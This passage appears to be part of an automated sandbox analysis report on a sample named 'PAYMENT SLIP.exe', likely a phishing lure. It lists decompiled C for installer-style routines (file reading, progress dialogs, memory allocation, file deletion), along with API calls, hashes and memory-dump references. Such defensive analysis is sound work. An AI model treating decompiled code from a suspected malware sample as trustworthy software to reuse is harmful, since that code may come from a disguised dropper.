              0x0040685f
              0x0040685f
              0x00406864
              0x00406866
              0x00406869
              0x0040686e
              0x0040686f
              0x00406873
              0x00406873
              0x00406874
              0x0040687b
              0x0040687d
              0x00406884
              0x00000000
              0x00000000
              0x0040688c
              0x00406892
              0x00000000
              0x00000000
              0x00000000
              0x00406892
              0x00406897

              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
              • CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
              • CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
              • *?|<>/":, xrefs: 0040683D
              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 004067EB
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-1499207792
              • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
              • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004044F9, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









              0x0040450b
              0x004045c1
              0x00000000
              0x004045c1
              0x0040451c
              0x00404520
              0x00000000
              0x0040453a
              0x0040453a
              0x00404543
              0x00000000
              0x00000000
              0x00404545
              0x00404551
              0x00404554
              0x00404554
              0x0040455a
              0x00404560
              0x00404560
              0x0040456c
              0x00404572
              0x00404579
              0x0040457c
              0x0040457f
              0x00404581
              0x00404581
              0x00404589
              0x0040458f
              0x0040458f
              0x00404599
              0x0040459e
              0x004045a1
              0x004045a6
              0x004045a9
              0x004045a9
              0x004045b9
              0x004045b9
              0x00000000
              0x004045bc

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 00404516
              • GetSysColor.USER32(00000000), ref: 00404554
              • SetTextColor.GDI32(?,00000000), ref: 00404560
              • SetBkMode.GDI32(?,?), ref: 0040456C
              • GetSysColor.USER32(?), ref: 0040457F
              • SetBkColor.GDI32(?,?), ref: 0040458F
              • DeleteObject.GDI32(?), ref: 004045A9
              • CreateBrushIndirect.GDI32(?), ref: 004045B3
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026E4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D1C(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








              0x004026e4
              0x004026e6
              0x004026e9
              0x004026eb
              0x004026ee
              0x004026f3
              0x004026f7
              0x004026fa
              0x004026fd
              0x00402bc2
              0x00402bc5
              0x00402703
              0x00402703
              0x0040270a
              0x0040270c
              0x0040270c
              0x00402712
              0x00402876
              0x00402876
              0x00402879
              0x0040287e
              0x004015b6
              0x00402925
              0x00402925
              0x00000000
              0x00402718
              0x00402719
              0x00402724
              0x00402727
              0x00402733
              0x00402737
              0x004027cf
              0x004027e7
              0x004027f7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040273d
              0x0040273d
              0x00402740
              0x00402741
              0x00402744
              0x00402749
              0x00402750
              0x00402758
              0x00000000
              0x0040275e
              0x0040275e
              0x00402763
              0x00000000
              0x00402769
              0x00402769
              0x00402771
              0x00402774
              0x00402777
              0x00402832
              0x00402839
              0x0040277d
              0x00402783
              0x0040278f
              0x004027f9
              0x004027f9
              0x00402791
              0x00402791
              0x00402794
              0x00402796
              0x00402796
              0x00402796
              0x00402799
              0x0040279e
              0x004027a1
              0x00000000
              0x00000000
              0x004027a3
              0x004027a6
              0x004027b4
              0x004027ba
              0x004027c8
              0x00000000
              0x004027ca
              0x00000000
              0x004027ca
              0x00000000
              0x004027c8
              0x00402796
              0x004027fc
              0x004027ff
              0x00000000
              0x00402801
              0x00402806
              0x00402847
              0x00402869
              0x00402870
              0x00402855
              0x00402855
              0x00402858
              0x0040285b
              0x0040285e
              0x0040285e
              0x00000000
              0x0040280f
              0x0040280f
              0x00402812
              0x00402815
              0x0040281b
              0x0040281f
              0x00402822
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402822
              0x00402806
              0x004027ff
              0x00402777
              0x00402763
              0x00402758
              0x00000000
              0x00402824
              0x00402824
              0x00402827
              0x00402830
              0x00000000
              0x00402727
              0x00402712
              0x00402bcb
              0x00402bd1

              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
              • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402FC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402FC6(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E0040696D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a270;
				if(_t6 >  *0x42a270) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a334 & 0x00000001;
					if(( *0x42a334 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402FAA());
						return E004055A4(0,  &_v132);
					}
				}
				return _t6;
			}







              0x00402fd5
              0x00402fd7
              0x00402fde
              0x00402fe1
              0x00402fe1
              0x00402fe7
              0x00000000
              0x00402fe7
              0x00402fef
              0x00402ff5
              0x00000000
              0x00402ff8
              0x00402fff
              0x00403005
              0x0040300b
              0x0040300d
              0x00403013
              0x00403051
              0x0040305a
              0x00000000
              0x0040305f
              0x00403015
              0x0040301c
              0x0040302d
              0x00000000
              0x0040303b
              0x0040301c
              0x00403067

              APIs
              • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
              • GetTickCount.KERNEL32 ref: 00402FFF
              • wsprintfW.USER32 ref: 0040302D
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • CreateDialogParamW.USER32 ref: 00403051
              • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                • Part of subcall function 00402FAA: MulDiv.KERNEL32(0002F5B0,00000064,00031437), ref: 00402FBF
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
              • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404E4D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404e5b
              0x00404e68
              0x00404e6e
              0x00404eac
              0x00404eac
              0x00404ebb
              0x00404ec2
              0x00000000
              0x00404ec4
              0x00404e70
              0x00404e7f
              0x00404e87
              0x00404e8a
              0x00404e9c
              0x00404ea2
              0x00404ea9
              0x00000000
              0x00404ea9
              0x00000000

              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
              • GetMessagePos.USER32 ref: 00404E70
              • ScreenToClient.USER32 ref: 00404E8A
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402F2B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402FAA();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a274 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






              0x00402f3b
              0x00402f49
              0x00402f4f
              0x00402f4f
              0x00402f5d
              0x00402f5f
              0x00402f6b
              0x00402f70
              0x00402f72
              0x00402f72
              0x00402f7d
              0x00402f8d
              0x00402f9f
              0x00402f9f
              0x00402fa7

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
              • wsprintfW.USER32 ref: 00402F7D
              • SetWindowTextW.USER32(?,?), ref: 00402F8D
              • SetDlgItemTextW.USER32 ref: 00402F9F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
              • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402947, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00402947(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
				_t50 = E00402D3E(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405E88(_t50) == 0) {
					E00402D3E(0xffffffed);
				}
				E0040600D(_t50);
				_t26 = E00406032(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a278;
					 *(_t56 - 0x44) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403590(_t45);
						E0040357A(_t49,  *(_t56 - 0x44));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
						 *(_t56 - 0x10) = _t54;
						if(_t54 != _t45) {
							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x3c) =  *_t54;
								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x3c);
							}
							GlobalFree( *(_t56 - 0x10));
						}
						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











              0x00402947
              0x00402949
              0x00402955
              0x00402958
              0x00402962
              0x00402966
              0x00402966
              0x0040296c
              0x00402979
              0x00402981
              0x00402984
              0x0040298a
              0x00402998
              0x0040299d
              0x004029a1
              0x004029a4
              0x004029ad
              0x004029b9
              0x004029bd
              0x004029c0
              0x004029ca
              0x004029e9
              0x004029d1
              0x004029d6
              0x004029de
              0x004029e1
              0x004029e6
              0x004029e6
              0x004029f0
              0x004029f0
              0x004029fd
              0x00402a03
              0x00402a15
              0x00402a15
              0x00402a1b
              0x00402a1b
              0x00402a26
              0x00402a27
              0x00402a2b
              0x00402a2f
              0x00402a35
              0x00402a35
              0x00402a3c
              0x004022e9
              0x00402bc5
              0x00402bd1

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
              • GlobalFree.KERNEL32 ref: 004029F0
              • GlobalFree.KERNEL32 ref: 00402A03
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
